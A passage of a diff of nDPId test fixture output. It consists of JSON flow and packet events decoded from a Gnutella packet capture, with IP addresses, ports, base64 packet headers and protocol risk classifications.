-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03zxAAIAGuFcKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88704,"flow_last_seen":88704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88704,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":88704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05t5AAIAGvPEKAAIPaJziSMRs0ArGWKhyAAAAAIAC+vAZ6QAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88704,"flow_last_seen":88704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88704,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":88704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cchAAIAGzAoKAAIPS4VlXcRtzI\/Cd\/CCAAAAAIAC+vBzNgAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88705,"flow_last_seen":88705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88705,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":88705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88705,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNJAAIAG5KYKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88706,"flow_last_seen":88706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88706,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":88706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88706,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYJAAIAGx78KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":88816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88816,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAyoAAEAGurFLhWVdCgACD8yPxG0AoxYBwnfwg2AS\/\/+AiAAAAgQFtA=="} 
-00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":88816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88816,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocclAAIAGzBUKAAIPS4VlXcRtzI\/Cd\/CDAKMWAlAQ+vCdVAAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88817,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":88817,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":88832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88832,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAywAAEAGIK1onOJICgACD9AKxGwApBABxlioc2AS\/\/8tOgAAAgQFtA=="} 
-00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":88832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88832,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5t9AAIAGvPwKAAIPaJziSMRs0ArGWKhzAKQQAlAQ+vBKBgAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":88833,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83805,"flow_last_seen":83805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":83805,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":83805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":83805,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8ZAAIAGrlAKAAIPcfxWosRbJBfMcOElAAAAAIAC+vAJaQAAAgQFtAEDAwgBAQQC"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":84026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84026,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwcAAEAGoxhx\/FaiCgACDyQXxFsAmFgBzHDhJmAS\/\/\/UxQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":84026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84026,"pkt":"UlQAEjUCCAAn5uVZCABFAAAod8dAAIAGrlsKAAIPcfxWosRbJBfMcOEmAJhYAlAQ+vDxkQAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83805,"flow_last_seen":84027,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84027,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYlAAIAGqN4KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOhAAIAGV+wKAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsdAAIAGE84KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} 
+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84592,"flow_last_seen":84592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84592,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":84592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84592,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0v8BAAIAGYs4KAAIP0tH5VMRcYK9pfUzQAAAAAIAC+vDAkAAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84592,"flow_last_seen":84592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84592,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":84592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84592,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sD9AAIAG2QsKAAIP2meLAsRdDHIwnISEAAAAAIAC+vB8tgAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84593,"flow_last_seen":84593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84593,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5JAAIAGmKgKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} 
+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84593,"flow_last_seen":84593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84593,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KpdAAIAGI14KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":84824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84824,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwwAAEAGn4vS0flUCgACD2CvxFwAmkwBaX1M0WAS\/\/+X6wAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":84824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84824,"pkt":"UlQAEjUCCAAn5uVZCABFAAAov8FAAIAGYtkKAAIP0tH5VMRcYK9pfUzRAJpMAlAQ+vC0twAA"} 
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84825,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":84862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84862,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAw4AAEAGBkbaZ4sCCgACDwxyxF0Am0YBMJyEhWAS\/\/9aEAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":84863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84863,"pkt":"UlQAEjUCCAAn5uVZCABFAAAosEBAAIAG2RYKAAIP2meLAsRdDHIwnISFAJtGAlAQ+vB23AAA"} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":84863,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07jxAAIAGRpwKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AtdAAIAGwDkKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03ztAAIAGuFgKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85608,"flow_last_seen":85608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":85608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85608,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UCdAAIAGv8oKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} 
+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86639,"flow_last_seen":86639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86639,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":86639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86639,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EcBAAIAG34AKAAIPYPacfsRk2wZPr5++AAAAAIAC+vDbwgAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86639,"flow_last_seen":86639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86639,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
